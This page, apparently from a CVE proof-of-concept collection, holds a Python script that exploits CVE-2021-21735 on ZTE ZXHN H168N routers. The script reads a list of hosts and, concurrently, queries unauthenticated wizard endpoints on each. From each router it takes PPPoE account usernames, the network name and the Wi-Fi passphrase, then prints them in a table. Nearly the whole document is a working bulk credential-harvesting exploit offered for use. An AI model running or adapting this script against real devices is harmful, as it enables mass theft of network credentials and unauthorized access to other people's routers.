5585 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / zte_zxhn_h168n_bulk_poc.py PY
import argparse
import asyncio
import html
import re
from pathlib import Path

import aiohttp
from colorama import Fore, Style, init


DEFAULT_INPUT_PATH = Path("urls.txt")
PASSWORD_FORM = {
    "IF_ACTION": "GetPassword",
    "_InstID_PASS": "DEV.WIFI.AP1.PSK1",
    "PASSTYPE": "PSK",
}
TABLE_TEMPLATE = "{:<3} | {:<34} | {:<30} | {:<30} | {:<30} | {:<25}"
HEADERS = ["#", "URL", "AD Username", "VD Username", "ESSID", "Wi-Fi Password"]
AD_USERNAME_PATTERN = r"<ADUsername>(.*?)</ADUsername>"
VD_USERNAME_PATTERN = r"<VDUsername>(.*?)</VDUsername>"
ESSID_PATTERN = r"<ParaName>\s*ESSID\s*</ParaName>\s*<ParaValue>\s*(.*?)\s*</ParaValue>"
PASSWORD_PATTERN = r"<ParaName>KeyPassphrase</ParaName>\s*<ParaValue>(.*?)</ParaValue>"

init()


def parse_args() -> argparse.Namespace:
    parser = argparse.ArgumentParser(
        description="Bulk PoC for CVE-2021-21735 against ZTE ZXHN H168N wizard endpoints."
    )
    parser.add_argument(
        "-i",
        "--input",
        type=Path,
        default=DEFAULT_INPUT_PATH,
        help="Path to a newline-delimited host list.",
    )
    parser.add_argument(
        "--timeout",
        type=int,
        default=10,
        help="Per-host request timeout in seconds.",
    )
    return parser.parse_args()


def extract(pattern: str, text: str, default: str = "") -> str:
    match = re.search(pattern, text, re.DOTALL)
    if not match:
        return default
    return html.unescape(match.group(1).strip())


def load_hosts(input_path: Path) -> list[str]:
    return [line.strip() for line in input_path.read_text(encoding="utf-8").splitlines() if line.strip()]


async def fetch_text(session: aiohttp.ClientSession, method: str, url: str, **kwargs) -> str:
    async with session.request(method, url, **kwargs) as response:
        response.raise_for_status()
        return await response.text()


async def extract_router_secrets(session: aiohttp.ClientSession, host: str) -> dict[str, str]:
    base_url = f"http://{host}/wizard_page"

    try:
        pppoe_xml = await fetch_text(session, "GET", f"{base_url}/wizard_pppoe_lua.lua")
        wlan_xml = await fetch_text(session, "GET", f"{base_url}/wizard_wlan_config_lua.lua")
        password_xml = await fetch_text(
            session,
            "POST",
            f"{base_url}/wizard_wlan_config_lua.lua",
            data=PASSWORD_FORM,
        )
    except Exception:
        return {
            "URL": host,
            "AD Username": "",
            "VD Username": "",
            "ESSID": "",
            "Wi-Fi Password": "",
        }

    return {
        "URL": host,
        "AD Username": extract(AD_USERNAME_PATTERN, pppoe_xml),
        "VD Username": extract(VD_USERNAME_PATTERN, pppoe_xml),
        "ESSID": extract(ESSID_PATTERN, wlan_xml),
        "Wi-Fi Password": extract(PASSWORD_PATTERN, password_xml)[:64],
    }


def print_header() -> None:
    header = TABLE_TEMPLATE.format(
        "#",
        Fore.RED + HEADERS[1],
        Fore.GREEN + HEADERS[2],
        Fore.YELLOW + HEADERS[3],
        Fore.BLUE + HEADERS[4],
        Fore.MAGENTA + HEADERS[5] + Style.RESET_ALL,
    )
    separator = Fore.CYAN + "-" * len(header) + Style.RESET_ALL
    print(separator)
    print(header + "|")
    print(separator)


def print_row(index: int, row: dict[str, str]) -> None:
    rendered = TABLE_TEMPLATE.format(
        str(index),
        Fore.RED + row["URL"],
        Fore.GREEN + row["AD Username"],
        Fore.YELLOW + row["VD Username"],
        Fore.BLUE + row["ESSID"],
        Fore.MAGENTA + row["Wi-Fi Password"] + Style.RESET_ALL,
    )
    separator = Fore.CYAN + "-" * len(rendered) + Style.RESET_ALL
    print(rendered + "|")
    print(separator)


async def run_bulk_poc(input_path: Path, timeout_seconds: int) -> None:
    hosts = load_hosts(input_path)
    seen: set[tuple[str, str, str, str, str]] = set()
    results: list[dict[str, str]] = []

    print_header()

    timeout = aiohttp.ClientTimeout(total=timeout_seconds)
    async with aiohttp.ClientSession(timeout=timeout) as session:
        tasks = [asyncio.create_task(extract_router_secrets(session, host)) for host in hosts]

        for task in asyncio.as_completed(tasks):
            try:
                row = await task
            except Exception as error:
                print(f"{Fore.RED}Error: {error}{Style.RESET_ALL}")
                continue

            identity = (
                row["URL"],
                row["AD Username"],
                row["VD Username"],
                row["ESSID"],
                row["Wi-Fi Password"],
            )
            if identity in seen:
                continue

            seen.add(identity)
            results.append(row)
            print_row(len(results), row)


def main() -> None:
    args = parse_args()
    asyncio.run(run_bulk_poc(args.input, args.timeout))


if __name__ == "__main__":
    main()